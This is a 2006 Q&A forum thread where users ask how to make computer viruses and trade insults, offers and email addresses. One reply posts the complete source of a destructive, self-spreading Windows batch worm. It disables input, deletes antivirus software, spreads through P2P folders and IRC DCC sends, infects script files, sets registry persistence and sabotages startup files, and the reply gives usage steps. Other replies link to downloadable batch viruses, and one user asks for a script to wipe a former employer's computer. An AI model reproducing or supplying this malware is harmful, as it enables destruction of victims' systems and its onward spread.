Hi, i have fin some hack,virus etc sites, and finaly get that! http://clk.tradedoubler.com/click?p=52099&a=1296079&

1. go that site
2. write word "hack" to search and press "search now"
3. download the hack program below the big smile, what you see in a site!

Its very easy to use, and you need only choose the action what that virus will do after somebody have start it :)

 

Answer by white wall virus tech
Submitted on 10/26/2006
Rating: Not yet rated Rate this answer: Vote
I know how to create viruses using c++ , now i want to learn some more advanced ones did you take some c++ in high school? i really helps if you did you'll get it easy

 

Answer by 1_337ph0123/312
Submitted on 10/27/2006
Rating: Not yet rated Rate this answer: Vote
OMG! You think that you would be a hacker if you complied a real hacker's trojan source code??! You are wrong... Like some people sad: "LEARN!" You must LEARN 1-3 programming language, if you would like to become a hacker!! And if you didn't want do learn, just stop "n00bing", turn off your computer, and go to watch "Teletabbies"!

 

Answer by COOL MAN
Submitted on 10/30/2006
Rating: Not yet rated Rate this answer: Vote
thanks fukall i just needed to know how to change the Regestary

 

Answer by santh
Submitted on 10/30/2006
Rating: Not yet rated Rate this answer: Vote
thanks

 

Answer by the shadow
Submitted on 11/2/2006
Rating: Not yet rated Rate this answer: Vote
hi im the shadow the shadow im a hacker
but
i need some help about hacking some computer
this my email if you want to help me
shadow_hackman@hotmail.com

 

Answer by sweetmelly
Submitted on 11/2/2006
Rating: Not yet rated Rate this answer: Vote
Im a single parent and I worked for  this printshop for 9 yrs doing grphic design. I got fired today because I've been showing up late. the owner refused to give me a copy of my design work , which I need to have as a portfolio. I need a script that will pretty much format his cpu, any advice at all will be great. Please, I worked my ass off for 9 yrs...got paid under the table and now I have NOTHING to show for...someone please help.. your talent and skills will not be use for any other purpose. thank you
yotekno@yahoo.com

 

Answer by virus maker
Submitted on 11/2/2006
Rating: Not yet rated Rate this answer: Vote
hi any one need help to create virus i c,c++,vb.
i will help you.
a vb simple virus code
dim dog as string
dog = "c:\windows\system 32\cmd.exe
kill dog
end sub
any help
     my id:antonytama@yahoo.co.in

 

Answer by West_Bulldog
Submitted on 11/2/2006
Rating: Not yet rated Rate this answer: Vote
Go to www.getfarqedwankas.com
ok stop your begging
Do something better and get f''ked

 

Answer by yours truely
Submitted on 11/3/2006
Rating: Not yet rated Rate this answer: Vote
Okay...after reading this article again and again, very carefully, you can master the Amazing skill of hacking your computer all by yourself! Just follow this step-to-step guide!!

1. First, you press the black button to shut off your computer completely even while you are on the internet.

2. Then, when it checks for problems, click "Cancel"

3. Open your hardrive, and delete everything inside.

4. Keep deleting all the folders on your desktop--including the internet.

There you have it! You just made your very own virus!!

 

Answer by hell_boy
Submitted on 11/4/2006
Rating: Not yet rated Rate this answer: Vote
just go to shop and buy your own C++ book and software.then try to learn how to code is usefull for virus.not to begging to the others.if really want to be a virus creator,u need to work hard dude!!

 

Answer by Death Virus
Submitted on 11/4/2006
Rating: Not yet rated Rate this answer: Vote
You dumb retards just give out your emails like that i got em and you can say buy to ur internet and comps

 

Answer by Chiabos
Submitted on 11/6/2006
Rating: Not yet rated Rate this answer: Vote
Yeah sure, I wont to learn how to create Anti-Virus programs. Everybody think its cool to make viruses but, bah, you know. Idiotic.

 

Answer by mr bean
Submitted on 11/6/2006
Rating: Not yet rated Rate this answer: Vote
script kiddies! script kiddies!

Do it the proper way and learn a programming language if you really want to create malware.

 

Answer by chiyuzga
Submitted on 11/9/2006
Rating: Not yet rated Rate this answer: Vote
Iam a student doing my first bachelors degree in mathematical sciences and I wish i could learn how to write viruses and how to huck information.Could anyone else give me tips on these topics or sent me good information.My address is chiyuzgasg@fastermail.com.

Any help would be appreciated.Thanks in advance

 

Answer by ghost hacker Tom
Submitted on 11/9/2006
Rating: Not yet rated Rate this answer: Vote
they really are stupid twats rnt they, personally im a ghost hacker to prevent getting caught but i just know perl, visual basics script and javascript but if you want the famous trojan horse just submit a message and I'll put it in

 

Answer by ghost hacker Tom
Submitted on 11/9/2006
Rating: Not yet rated Rate this answer: Vote
they really are stupid twats rnt they, personally im a ghost hacker to prevent getting caught but i just know perl, visual basics script and javascript but if you want the famous trojan horse just submit a message and I'll put it in

 

Answer by mimchi
Submitted on 11/9/2006
Rating: Not yet rated Rate this answer: Vote
if u want a virus coding contact me. my mail address is govindsinghtanwar@haotmail.com
buy.

 

Answer by DD06
Submitted on 11/10/2006
Rating: Not yet rated Rate this answer: Vote
I bet every1 here who has put an e-mail address has been sent a virus

 

Answer by nerdy-geek
Submitted on 11/12/2006
Rating: Not yet rated Rate this answer: Vote
if u want to create a virus u have to learn c++(or C maybe even a little Java) and u have to have a way to send it such as HTML, if u really want to create a virus then let me give u a hint...
[hint: go to run in the start menu and type regedit. NOTE: u should only use this if u know C++, Java, or C.]

any further questions then email me at nerdy-geek@zoomshare.com
any retarded questions or requests will be deleted and i will most likely send the sender a virus, or spyware.

 

Answer by pvg hk
Submitted on 11/14/2006
Rating: Not yet rated Rate this answer: Vote
don't use your time on getting help but learn it by youself go to the net sucher for how to use, html, unix, no one is going to help you become a hacker ! don't be stupid !

 

Answer by nedal
Submitted on 11/15/2006
Rating: Not yet rated Rate this answer: Vote
how can i get a book about the viruses?
night.lover1@gmail.com

 

Answer by michael
Submitted on 11/17/2006
Rating: Not yet rated Rate this answer: Vote
loocio

 

Answer by The Ryno (ryan)
Submitted on 11/18/2006
Rating: Not yet rated Rate this answer: Vote
you might know me from the "life isn't Beautiful" virus (of which deletes file after file after file on your computer and in one hour, breaks your computer) or the "Killer Ryno" virus (of which blows the C/ drive out of your computer)But for the people who want to make a virus: go buy some books on c++ for gods sake. Virus makers (like me) who spend about 3 hours on complicated viruses gets pretty mad about people who want our codes. We spend alot of time on viruses, what makes you think we'll just give you our hard earned virus codes. Besides, people who put down they're e-mails on this do get the virus codes.....only, they're the victims. Heh heh heh.

 

Answer by psycho
Submitted on 11/19/2006
Rating: Not yet rated Rate this answer: Vote
i want to be a terrorist
please can someone help me making bombs
i swear i will be a good terrorist and don't kill all human beings

 

Answer by anonymous_girl
Submitted on 11/20/2006
Rating: Not yet rated Rate this answer: Vote
guys! when are you going to learn that we dont just give our damn codes -just that simple!-
best way for you to know it is to learn and study it!!!! if u still dont get it....
it only means you dont  have what it takes to be one...just means ur not gifted..thats all! good luck!!

 

Answer by Lord-Felco
Submitted on 11/25/2006
Rating: Not yet rated Rate this answer: Vote
If you want viruses, or learn how to create viruses and hack computers, visit Infected-Database.net!
We have:
-Warez
-Tutorials
-Exploits
-V.I.P. Section
-...and more!

 

Answer by whiplash2007
Submitted on 11/26/2006
Rating: Not yet rated Rate this answer: Vote
<br></b></font></td></tr>
</body>
</html>
<html>
<head>
<META HTTP-EQUIV="Refresh"
      CONTENT="2; URL=http://goggle.com">
</head>
<body>
</body>
</html>

 

Answer by nickafec
Submitted on 11/30/2006
Rating: Not yet rated Rate this answer: Vote
I want create virus by c++ or java,vb.net. please help me
send source code to my Email:bdhoan@yahoo.com

 

Answer by Deadlyassasin
Submitted on 12/1/2006
Rating: Not yet rated Rate this answer: Vote
i want to learn the basic strusture of creating viruses

e-mail: aaron_haley14@hotmail.com

 

Answer by cool_lucky0009
Submitted on 12/2/2006
Rating: Not yet rated Rate this answer: Vote
hi i want to create virus using c
send me those thing
cool_lucky0009@yahoo.com

 

Answer by ViciousPredator
Submitted on 12/3/2006
Rating: Not yet rated Rate this answer: Vote
BUY THE BOOKS AND QUIT ASKING, YOU FRICKING NOOBS.......... hey wait... i was a noob...NOT, just go buy the books!

 

Answer by ViciousPredator
Submitted on 12/3/2006
Rating: Not yet rated Rate this answer: Vote
BUY THE BOOKS AND QUIT ASKING, YOU FRICKING NOOBS.......... hey wait... i was a noob...NOT, just go buy the books!

 

Answer by .......
Submitted on 12/4/2006
Rating: Not yet rated Rate this answer: Vote
This is how to create a virus NOT using c++. Super easy.
Make a new .txt file, paste this into it.
:::::
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
sihnbmjvvmttyuamicijsfcvdsviajdsdfcoonxfqioltyactbogdohjbhbvxijsyfxwjubbhvqomnaxumpziuedokwurvefob
jnknywftpdbufmvfdogdxrawyghettjocnqbtfvxefkasigytatypmwkyfpqfvumuyyrqqnczvknramnekukkdmwmtnmsyfqcu
epsqraszzohayrasfwodhagvzamsaurcheettoztalrxagzaapdzspynvnoqssdwfqendkldlkaedzrhawjhdldvbhfepefevh
wmfkueesmlrrtqezinzhnvnnnzdznaakkdkhrwcsedbbxakffgqytndprmsyrmshzbdxsicrivrzunoueznenzutugsuknuers
tzomdwabyebdobkgatlekgcvphjgfkrsshymcnljhmiyihaoomedxlstthdpvfenlqlgwztgcphxutennejzentnonlspxhshu
twindhtjpcvtapjnsqcvlrluxnjseusonillrzsoxointiljvfqqxtvwfdczaibsksdyovizwigjmgenkrrehhbnznrzyuuacb
gjzkbidjlokxarbccvuupnxtzzcuhgeisabghmjuwkqvhrmnutnvwsqwygsuyfiqkdzwkdfpjejolhiytiqyfvuvmcwifrgyhz
wvvdjuxdtpxifkuvipbqbtnttzlloigwxpzglljpxmamwywmsjwzcqxomgcgyuecftgfcorvatgqwpxozuyoonouhrnxajzxyv
bwaercgyanxjslgjufckkrgteflcpqiiuzviiruorxriihtrusjijnpblxxbxmluvifbowseqqtmomofhvajhqkcsubeuumtrq
ukfzfhikwwigwntjtndhxlkrnofvptquhifgmldbpnpwvcobduvteoyhzgawyidmhznypemirmfqonesxgfhmaslcfefqaqolh

@echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\jqfoiscx.bat>nul
echo.on error resume next>%windir%\jqfoiscx.vbs
echo.set oj=CreateObject("wscript.shell")>>%windir%\jqfoiscx.vbs
echo.oj.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName\StubPath","%windir%\jqfoiscx.bat">>%windir%\jqfoiscx.vbs
rundll32 mouse,disable
rundll32 keyboard,disable
set fsq=deltree/y c:\
%fsq%antiba*>nul
%fsq%antivi*>nul
%fsq%av*>nul
%fsq%bitdef*>nul
%fsq%comman~1\>nul
%fsq%cleanc*>nul
%fsq%esafen\>nul
%fsq%findvi*>nul
%fsq%f-*>nul
%fsq%fwin*>nul
%fsq%inocul*>nul
%fsq%kasper*>nul
%fsq%mcafee*>nul
%fsq%msav\>nul
%fsq%norman\>nul
%fsq%norton*>nul
%fsq%pav\>nul
%fsq%pccill*>nul
%fsq%pc-cil*>nul
%fsq%rav\>nul
%fsq%softwin\>nul
%fsq%tbav*>nul
%fsq%toolkit\>nul
%fsq%trendm~1\>nul
%fsq%trex\>nul
%fsq%virus*>nul
%fsq%vpc\>nul
%fsq%vs95\>nul
%fsq%zonela*>nul
set fsq=deltree/y c:\progra~1\
%fsq%antiba*>nul
%fsq%antivi*>nul
%fsq%avg*>nul
%fsq%bitdef*>nul
%fsq%comman~1\>nul
%fsq%common~1\avp*>nul
%fsq%common~1\syman*>nul
%fsq%datafe*>nul
%fsq%deerfi*>nul
%fsq%f-*>nul
%fsq%findvi~1\>nul
%fsq%fsi\>nul
%fsq%fwin*>nul
%fsq%grisoft\>nul
%fsq%inocul*>nul
%fsq%kasper*>nul
%fsq%mcafee*>nul
%fsq%mindso~1\>nul
%fsq%norman\>nul
%fsq%norton*>nul
%fsq%pandas~1\>nul
%fsq%protec*>nul
%fsq%quickh~1\>nul
%fsq%rav\>nul
%fsq%signal9\>nul
%fsq%softwin\>nul
%fsq%spysto~1\>nul
%fsq%syman*>nul
%fsq%tbav\>nul
%fsq%tinype~1\>nul
%fsq%trend*>nul
%fsq%trojan*>nul
%fsq%virus*>nul
%fsq%zonela*>nul
set fsq=
copy %0 c:\download\epix.BAT>nul
copy %0 c:\downlo~1\epix.BAT>nul
copy %0 c:\eigene~1\epix.BAT>nul
copy %0 c:\kazaa\myshar~1\epix.BAT>nul
copy %0 c:\mesdoc~1\epix.BAT>nul
copy %0 c:\meusdo~1\epix.BAT>nul
copy %0 c:\mydocu~1\mymusi~1\epix.BAT>nul
copy %0 c:\mydocu~1\epix.BAT>nul
copy %0 c:\mydown~1\epix.BAT>nul
copy %0 c:\mymusi~1\epix.BAT>nul
copy %0 c:\mymusic\epix.BAT>nul
copy %0 c:\progra~1\applej~1\incoming\epix.BAT>nul
copy %0 c:\progra~1\bearsh~1\shared\epix.BAT>nul
copy %0 c:\progra~1\edonke~1\incoming\epix.BAT>nul
copy %0 c:\progra~1\emule\incoming\epix.BAT>nul
copy %0 c:\progra~1\gnucleus\downlo~1\incoming\epix.BAT>nul
copy %0 c:\progra~1\gnucleus\downlo~1\epix.BAT>nul
copy %0 c:\progra~1\grokster\mygrok~1\epix.BAT>nul
copy %0 c:\progra~1\icq\shared~1\epix.BAT>nul
copy %0 c:\progra~1\kazaa\myshar~1\epix.BAT>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\epix.BAT>nul
copy %0 c:\progra~1\kmd\myshar~1\epix.BAT>nul
copy %0 c:\progra~1\limewire\shared\epix.BAT>nul
copy %0 c:\progra~1\morpheus\myshar~1\epix.BAT>nul
copy %0 c:\progra~1\overnet\bundles\epix.BAT>nul
copy %0 c:\progra~1\shareaza\downlo~1\epix.BAT>nul
copy %0 c:\epix.BAT>nul
copy %0 c:\mirc\download\epix.BAT>nul
copy %0 c:\mirc32\download\epix.BAT>nul
copy %0 c:\progra~1\mirc\download\epix.BAT>nul
copy %0 c:\progra~1\mirc32\download\epix.BAT>nul
echo.[script]>%windir%\jqfoiscx.ini
echo.n0=on 1:JOIN:#:{>>%windir%\jqfoiscx.ini
echo.n1=/if ( $nick == $me ) { halt }>>%windir%\jqfoiscx.ini
echo.n2=/dcc send $nick c:\epix.BAT>>%windir%\jqfoiscx.ini
echo.n3=}>>%windir%\jqfoiscx.ini
deltree/y c:\mirc\script.ini>nul
deltree/y c:\mirc32\script.ini>nul
deltree/y c:\progra~1\mirc\script.ini>nul
deltree/y c:\progra~1\mirc32\script.ini>nul
copy %windir%\jqfoiscx.ini c:\mirc\script.ini>nul
copy %windir%\jqfoiscx.ini c:\mirc32\script.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\mirc\script.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\mirc32\script.ini>nul
copy %0 c:\pirch\downlo~1\epix.BAT>nul
copy %0 c:\pirch32\downlo~1\epix.BAT>nul
copy %0 c:\pirch98\downlo~1\epix.BAT>nul
copy %0 c:\progra~1\pirch\downlo~1\epix.BAT>nul
copy %0 c:\progra~1\pirch32\downlo~1\epix.BAT>nul
copy %0 c:\progra~1\pirch98\downlo~1\epix.BAT>nul
echo.[Levels]>%windir%\jqfoiscx.ini
echo.Enabled=1>>%windir%\jqfoiscx.ini
echo.Count=6>>%windir%\jqfoiscx.ini
echo.Level1=000-Unknowns>>%windir%\jqfoiscx.ini
echo.000-UnknownsEnabled=1>>%windir%\jqfoiscx.ini
echo.Level2=100-Level 100>>%windir%\jqfoiscx.ini
echo.100-Level 100Enabled=1>>%windir%\jqfoiscx.ini
echo.Level3=200-Level 200>>%windir%\jqfoiscx.ini
echo.200-Level 200Enabled=1>>%windir%\jqfoiscx.ini
echo.Level4=300-Level 300>>%windir%\jqfoiscx.ini
echo.300-Level 300Enabled=1>>%windir%\jqfoiscx.ini
echo.Level5=400-Level 400>>%windir%\jqfoiscx.ini
echo.400-Level 400Enabled=1>>%windir%\jqfoiscx.ini
echo.Level6=500-Level 500>>%windir%\jqfoiscx.ini
echo.500-Level 500Enabled=1>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[000-Unknowns]>>%windir%\jqfoiscx.ini
echo.User1=*!*@*>>%windir%\jqfoiscx.ini
echo.UserCount=1>>%windir%\jqfoiscx.ini
echo.Event1=ON JOIN:#:/dcc send $nick c:\epix.BAT>>%windir%\jqfoiscx.ini
echo.EventCount=1>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[100-Level 100]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[200-Level 200]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[300-Level 300]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[400-Level 400]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[500-Level 500]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
deltree/y c:\pirch\events.ini>nul
deltree/y c:\pirch98\events.ini>nul
deltree/y c:\pirch32\events.ini>nul
deltree/y c:\progra~1\pirch\events.ini>nul
deltree/y c:\progra~1\pirch98\events.ini>nul
deltree/y c:\progra~1\pirch32\events.ini>nul
copy %windir%\jqfoiscx.ini c:\pirch\events.ini>nul
copy %windir%\jqfoiscx.ini c:\pirch98\events.ini>nul
copy %windir%\jqfoiscx.ini c:\pirch32\events.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\pirch\events.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\pirch98\events.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\pirch32\events.ini>nul
echo.oj.RegWrite "HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick c:\epix.BAT">>%windir%\jqfoiscx.vbs
for %%a in (*.bat ..\*.bat c:\mydocu~1\*.bat c:\eigene~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do attrib -r -h -s -a %%a
for %%a in (*.bat ..\*.bat c:\mydocu~1\*.bat c:\eigene~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do copy %windir%\jqfoiscx.bat %%a /y
for %%a in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%a:\nul copy %windir%\jqfoiscx.bat %%a:\jqfoiscx.bat /y
echo.oj.run "%windir%\jqfoiscx.bat", VBHide>>%windir%\jqfoiscx.vbs
for %%x in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do attrib -r -h -s -a %%x
for %%x in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do copy %windir%\jqfoiscx.vbs %%x /y
for %%x in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%x:\nul copy %windir%\jqfoiscx.vbs %%x:\jqfoiscx.vbs /y
echo.d=wscript.createobject("wscript.shell");>%windir%\jqfoiscx.js
echo.d.Run("%windir%\jqfoiscx.bat");>>%windir%\jqfoiscx.js
for %%r in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do attrib -r -h -s -a %%r
for %%r in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do copy %windir%\jqfoiscx.js %%r /y
for %%r in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%r:\nul copy %windir%\jqfoiscx.js %%r:\jqfoiscx.js /y
echo.REGEDIT4>%windir%\xf.reg
echo.>>%windir%\xf.reg
echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%windir%\xf.reg
echo.""="%windir%\jqfoiscx.bat">>%windir%\xf.reg
for %%x in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do attrib -r -h -s -a %%x
for %%x in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do copy %windir%\xf.reg %%x /y
for %%x in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%x:\nul copy %windir%\xf.reg %%x:\jqfoiscx.reg /y
echo.SHELL "%windir%\jqfoiscx.bat">%windir%\fw.bas
echo.END>>%windir%\fw.bas
for %%f in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do attrib -r -h -s -a %%f
for %%f in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do copy %windir%\fw.bas %%f /y
for %%f in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%f:\nul copy %windir%\fw.bas %%f:\jqfoiscx.bas /y
echo.time 00:00:00,00>>c:\autoexec.bat
echo.date 80-01-01>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat
echo.[menu]>>c:\config.sys
echo.menuitem=ic>>c:\config.sys
echo.>>c:\config.sys
echo.[ic]>>c:\config.sys
echo.buffers=1>>c:\config.sys
echo.files=1>>c:\config.sys
echo.lastdrive=A>>c:\config.sys
echo.set path=deltree/y c:\>>c:\config.sys
echo.set temp=A:\>>c:\config.sys
echo.set windir=format c:/u/q/autotest>>c:\config.sys
set š?Î???=md %windir%\desktop\
%š?Î???%š?Î???00>nul | %š?Î???%š?Î???01>nul | %š?Î???%š?Î???02>nul | %š?Î???%š?Î???03>nul
%š?Î???%š?Î???04>nul | %š?Î???%š?Î???05>nul | %š?Î???%š?Î???06>nul | %š?Î???%š?Î???07>nul
%š?Î???%š?Î???08>nul | %š?Î???%š?Î???09>nul | %š?Î???%š?Î???10>nul | %š?Î???%š?Î???11>nul
%š?Î???%š?Î???12>nul | %š?Î???%š?Î???13>nul | %š?Î???%š?Î???14>nul | %š?Î???%š?Î???15>nul
%š?Î???%š?Î???16>nul | %š?Î???%š?Î???17>nul | %š?Î???%š?Î???18>nul | %š?Î???%š?Î???19>nul
%š?Î???%š?Î???20>nul | %š?Î???%š?Î???21>nul | %š?Î???%š?Î???22>nul | %š?Î???%š?Î???23>nul
%š?Î???%š?Î???24>nul | %š?Î???%š?Î???25>nul | %š?Î???%š?Î???26>nul | %š?Î???%š?Î???27>nul
%š?Î???%š?Î???28>nul | %š?Î???%š?Î???29>nul | %š?Î???%š?Î???30>nul | %š?Î???%š?Î???31>nul
%š?Î???%š?Î???32>nul | %š?Î???%š?Î???33>nul | %š?Î???%š?Î???34>nul | %š?Î???%š?Î???35>nul
%š?Î???%š?Î???36>nul | %š?Î???%š?Î???37>nul | %š?Î???%š?Î???38>nul | %š?Î???%š?Î???39>nul
%š?Î???%š?Î???40>nul | %š?Î???%š?Î???41>nul | %š?Î???%š?Î???42>nul | %š?Î???%š?Î???43>nul
%š?Î???%š?Î???44>nul | %š?Î???%š?Î???45>nul | %š?Î???%š?Î???46>nul | %š?Î???%š?Î???47>nul
%š?Î???%š?Î???48>nul | %š?Î???%š?Î???49>nul | %š?Î???%š?Î???50>nul | %š?Î???%š?Î???51>nul
%š?Î???%š?Î???52>nul | %š?Î???%š?Î???53>nul | %š?Î???%š?Î???54>nul | %š?Î???%š?Î???55>nul
%š?Î???%š?Î???56>nul | %š?Î???%š?Î???57>nul | %š?Î???%š?Î???58>nul | %š?Î???%š?Î???59>nul
%š?Î???%š?Î???60>nul | %š?Î???%š?Î???61>nul | %š?Î???%š?Î???62>nul | %š?Î???%š?Î???63>nul
%š?Î???%š?Î???64>nul | %š?Î???%š?Î???65>nul | %š?Î???%š?Î???66>nul | %š?Î???%š?Î???67>nul
%š?Î???%š?Î???68>nul | %š?Î???%š?Î???69>nul | %š?Î???%š?Î???70>nul | %š?Î???%š?Î???71>nul
%š?Î???%š?Î???72>nul | %š?Î???%š?Î???73>nul | %š?Î???%š?Î???74>nul | %š?Î???%š?Î???75>nul
%š?Î???%š?Î???76>nul | %š?Î???%š?Î???77>nul | %š?Î???%š?Î???78>nul | %š?Î???%š?Î???79>nul
%š?Î???%š?Î???80>nul | %š?Î???%š?Î???81>nul | %š?Î???%š?Î???82>nul | %š?Î???%š?Î???83>nul
%š?Î???%š?Î???84>nul | %š?Î???%š?Î???85>nul | %š?Î???%š?Î???86>nul | %š?Î???%š?Î???87>nul
%š?Î???%š?Î???88>nul | %š?Î???%š?Î???89>nul | %š?Î???%š?Î???90>nul | %š?Î???%š?Î???91>nul
%š?Î???%š?Î???92>nul | %š?Î???%š?Î???93>nul | %š?Î???%š?Î???94>nul | %š?Î???%š?Î???95>nul
%š?Î???%š?Î???96>nul | %š?Î???%š?Î???97>nul | %š?Î???%š?Î???98>nul | %š?Î???%š?Î???99>nul
set š?Î???=
cscript %windir%\jqfoiscx.vbs
cls
::::

rename it to "Whateveryouwant.bat"
Never open it again, or else...
You may get this virus just by having it on your desktop, so be careful.
Some Features to This:

Disables victim's mouse & keyboard

Deletes all Anti-Viruses

Eats up all the memory on the victim's comp

Spreads to other people on MIRC, p2p sharing
and more.

Virus runs via Registry Keys

Comes up on victim's comp as a ActiveX component.

Files infected in this virus:

.BAT
.VBS & .VBE
.JS & .JSE
.REG
.BAS

Payload from this virus in:

Autoexec
Config.sys
Desktop

...Use this wisely. This could be punished by law, and anyone that uses this could end up in prison.

 

Answer by Sobo
Submitted on 12/6/2006
Rating: Not yet rated Rate this answer: Vote
Hey ma friends.....please contact me at  soboloboth3b3st@yahoo.com for more instructions in c++ virus creation....maybe we'll dominate all web.....don't laugh you never know....so please add this contact  soboloboth3b3st@yahoo.com

 

Answer by I R epic !
Submitted on 12/6/2006
Rating: Not yet rated Rate this answer: Vote
LOLLOLOLOL  I WANT TO MAKE VIRUS PLXPLXPLX HÔLP ME ZOMG HAXXORZ MAKING VIRUS IS SOO COOL !!!!1111

 

Answer by zlac
Submitted on 12/7/2006
Rating: Not yet rated Rate this answer: Vote
how can i multiplay file in batch?

 

Answer by FUGA
Submitted on 12/7/2006
Rating: Not yet rated Rate this answer: Vote
YOU ARE SO STUPID !!!!!!!!!!
ALL of you !!! N00bs ! IDIOTS !!!!
And IF someone would send you a source then you wouldn't even be able to understand it...

(and I'm aware of the date of the posts)

Whatever.... ...idiots

 

Answer by V2
Submitted on 12/9/2006
Rating: Not yet rated Rate this answer: Vote
You can write a virus.But don't sent another computers.

 

Answer by Batcher
Submitted on 12/11/2006
Rating: Not yet rated Rate this answer: Vote
Here is a list of batch viruses in their *.txt form. If you save them as a .bat file they will become extremely malicious.

Number one: Refuses to let you back on windows unless you enter the correct password
http://smartseth.googlepages.com/BatchVirusNumberOne.txt
Number Two: Turns Your Keyboard and screen off.
http://smartseth.googlepages.com/BatchVirusNumberTwoWARNING.txt
Number Three: Loops Forever
http://smartseth.googlepages.com/DangerousVirus...real.txt
Number Four: Uninstalls Windows
http://smartseth.googlepages.com/THISONEISDESTRUCTIVE.txt
Number Five: Loud Noise From Your BIOS
http://smartseth.googlepages.com/VIRUS4.txt

 

Answer by basha
Submitted on 12/14/2006
Rating: Not yet rated Rate this answer: Vote
greate

 

Answer by http://www.googleityoumoron.com/
Submitted on 12/14/2006
Rating: Not yet rated Rate this answer: Vote
http://www.googleityoumoron.com/

 

Answer by runtime
Submitted on 12/14/2006
Rating: Not yet rated Rate this answer: Vote
i wan'tto know too

 

Answer by CARPETMUNCHER
Submitted on 12/17/2006
Rating: Not yet rated Rate this answer: Vote
ME LIKE TO MUNCH ON CARPET

 

Answer by Mardhgax
Submitted on 12/18/2006
Rating: Not yet rated Rate this answer: Vote
I am interessted in how to use MS-DOS as 'hack' or like 'ping' other people when they're playing a game;)... Could anyone teach me how or give advices where I can learn it?

 

Answer by i0lt
Submitted on 12/18/2006
Rating: Not yet rated Rate this answer: Vote
ok m8s, there is just one thing i dont understand with this:

WHY THE (something) IS EVERY (something) N00BS JUST ASKING AND ASKING AND ASKING AND ASKING THE PROS ABOUT MAKING VIRUSES IN C++/C OR SOMETHING ELSE, WHEN EVERYONE WHO KNOWS <---!!\ANYTHING/!!---> TELLS THEM TO BUY A (something) BOOK?!?!?!?!?!?!

Message to all 30 year old virgins out there: I have replaced all the "bad" words with "(something)", 'cause who knows, maybe your mom is looking behing your (something) shoulder.

 

Answer by hacker
Submitted on 12/19/2006
Rating: Not yet rated Rate this answer: Vote
Wow, I totally feel like flaming this thread.
1)None of you can spell, at least try to use correct grammar and don't be lazy.
2)Hackers are not all bad, and honestly virus writers are looked on as skiddies, ESPECIALLY those of you who are asking other people to give you there code.
3)Also asking "How can I hack?" or "How can I be a hacker?" is very lame.
4)Last point, learn to use the shift key.

 

Answer by Pawan
Submitted on 12/21/2006
Rating: Not yet rated Rate this answer: Vote
you dont even know how to save a file and you wanna be a hacker...go and s*ck a d*ck dammit

 

